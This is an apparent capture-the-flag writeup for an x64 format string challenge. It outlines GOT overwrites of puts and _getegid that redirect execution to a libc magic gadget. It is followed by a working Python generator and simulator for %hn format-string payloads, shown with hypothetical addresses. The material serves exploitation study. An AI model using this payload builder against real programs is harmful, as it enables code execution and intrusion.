Rating:
This is basically an x64 format string attack. Our goal is to overwrite the GOT table with a magic gadget.
However, we have 3 major problems:
1. `puts` … at once
2. `puts` is used for looping, thus leaving us no other function to use for the magic gadget
3. `puts` … call

Solution:
1. Overwrite `puts` to 0x40122E so we can free up `_getegid`, `_setresgid` and `_setvbuf`
2. Leak `fgets` so we can calculate the libc base
3. Overwrite `_getegid` with the magic gadget
4. Overwrite `puts` to 0x4011BD to return to `_getegid`. This also satisfies the rax=NULL constraint.

For the full solution, check returns.py
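As an added example (this is not the writeup's returns.py, which is not on this page), here is a Python builder for the x64 format-string GOT writes the steps above rely on, plus a tiny printf model that applies the `%hn` writes to fake memory so a payload can be checked offline before it is sent. It runs the same two-stage idea as the writeup: park `puts` on an in-binary address, then point a freed-up entry at the gadget. The GOT slots, the resolved libc addresses, the gadget address and the format-string offset (`%6$`) are constructed assumptions; 0x40122E is the address the writeup redirects `puts` to.

```python
"""Build x86-64 format-string GOT overwrites and check them offline.

Added example, not the writeup's own code. Every address and the format
offset below are constructed for illustration (the page never states them),
except 0x40122E, the in-binary address the writeup redirects puts to.
"""
import re
import struct


def plan_halfword_writes(got_addr, current, target):
    """Return {address: value} for the 16-bit (%hn) chunks of an 8-byte GOT
    entry that differ between `current` and `target`.  A libc gadget shares
    the upper halfwords with the resolved libc function, so writing only the
    changed chunks keeps the format string short."""
    writes = {}
    for i in range(4):
        cur = (current >> (16 * i)) & 0xFFFF
        tgt = (target >> (16 * i)) & 0xFFFF
        if cur != tgt:
            writes[got_addr + 2 * i] = tgt
    return writes


def build_fmt_payload(writes, fmt_offset):
    """Turn {address: 16-bit value} into one format-string payload.

    fmt_offset is the %N$ index at which the first 8 bytes of our own input
    are read as an argument (found beforehand with a %N$p probe).  On x86-64
    the target addresses contain NUL bytes, so they go *after* all the
    directives; the directive block is padded to a multiple of 8 so every
    address lands in its own argument slot.  Writes are emitted in ascending
    value order so the output count only grows; %hn stores count mod 0x10000.
    Unnumbered %Nc mixed with %N$hn is undefined by POSIX, but glibc accepts
    it (pwntools' fmtstr_payload emits the same shape)."""
    ordered = sorted(writes.items(), key=lambda kv: kv[1])
    n_fmt_qwords = 1  # guess; index digits change the length, so iterate
    while True:
        fmt, count = b"", 0
        for i, (_addr, value) in enumerate(ordered):
            delta = (value - count) % 0x10000
            if delta:                       # %0c would still print 1 char
                fmt += b"%%%dc" % delta     # only the printed count matters
                count += delta
            fmt += b"%%%d$hn" % (fmt_offset + n_fmt_qwords + i)
        padded = fmt.ljust((len(fmt) + 7) // 8 * 8, b"A")
        if len(padded) // 8 == n_fmt_qwords:
            break
        n_fmt_qwords = len(padded) // 8
    return padded + b"".join(struct.pack("<Q", a) for a, _ in ordered)


DIRECTIVE = re.compile(rb"%(\d+)c|%(\d+)\$hn")


def simulate_printf(payload, fmt_offset, memory):
    """Minimal vfprintf model for the directives the builder emits.

    Argument N is modelled as the N-th 8-byte word of our own buffer (index
    fmt_offset == payload[0:8]).  Literal bytes count as output and, like the
    real thing, the format ends at the first NUL (inside the first address).
    Returns the number of characters 'printed'."""
    fmt = payload.split(b"\x00", 1)[0]
    count = pos = 0
    while pos < len(fmt):
        m = DIRECTIVE.match(fmt, pos)
        if m is None:                       # literal byte (padding, address)
            count += 1
            pos += 1
            continue
        if m.group(1) is not None:          # %Nc: N characters of output
            count += max(int(m.group(1)), 1)
        else:                               # %N$hn: store low 16 bits of count
            word = (int(m.group(2)) - fmt_offset) * 8
            if not 0 <= word <= len(payload) - 8:
                raise ValueError("argument index points outside our buffer")
            addr = struct.unpack_from("<Q", payload, word)[0]
            memory[addr] = count & 0xFF
            memory[addr + 1] = (count >> 8) & 0xFF
        pos = m.end()
    return count


def read_qword(memory, addr):
    return int.from_bytes(bytes(memory.get(addr + i, 0) for i in range(8)), "little")


def overwrite_got(memory, got_addr, target, fmt_offset):
    """One stage: plan, build and 'send' the payload that patches one GOT entry."""
    writes = plan_halfword_writes(got_addr, read_qword(memory, got_addr), target)
    payload = build_fmt_payload(writes, fmt_offset)
    simulate_printf(payload, fmt_offset, memory)
    return payload


def demo():
    """Two stages like the writeup: park puts on an in-binary address, then
    point another entry at the magic gadget.  All values are constructed."""
    PUTS_GOT, GETEGID_GOT = 0x404018, 0x404020                  # hypothetical
    LIBC_PUTS, LIBC_GETEGID = 0x7F3A2B455ED0, 0x7F3A2B4F1230    # hypothetical
    ONE_GADGET = 0x7F3A2B44E8B0   # hypothetical magic gadget in the same libc
    FMT_OFFSET = 6                # hypothetical: our input starts at %6$p
    memory = {}
    for got, val in ((PUTS_GOT, LIBC_PUTS), (GETEGID_GOT, LIBC_GETEGID)):
        for i, b in enumerate(struct.pack("<Q", val)):
            memory[got + i] = b
    p1 = overwrite_got(memory, PUTS_GOT, 0x40122E, FMT_OFFSET)
    p2 = overwrite_got(memory, GETEGID_GOT, ONE_GADGET, FMT_OFFSET)
    return read_qword(memory, PUTS_GOT), read_qword(memory, GETEGID_GOT), p1, p2


if __name__ == "__main__":
    puts_now, getegid_now, p1, p2 = demo()
    print(f"puts@GOT    = {puts_now:#x}  ({len(p1)}-byte payload {p1!r})")
    print(f"getegid@GOT = {getegid_now:#x}  ({len(p2)}-byte payload {p2!r})")
```

Each stage is a single printf call, so the three or four halfword writes happen inside that call and the entry is never left half-written when the function is next called. If the input buffer is too short for all the directives plus the trailing addresses, the writes have to be spread over several calls, and then the function whose entry is being patched must not run in between; that is exactly why a function the loop keeps calling, like `puts` here, is an awkward target and why the writeup parks it on in-binary addresses first. Before trusting the layout, check with a `%N$p` probe that the address slots really sit at the computed indices, and watch for addresses that contain `%` (0x25) or a NUL in the low bytes, which break the format string.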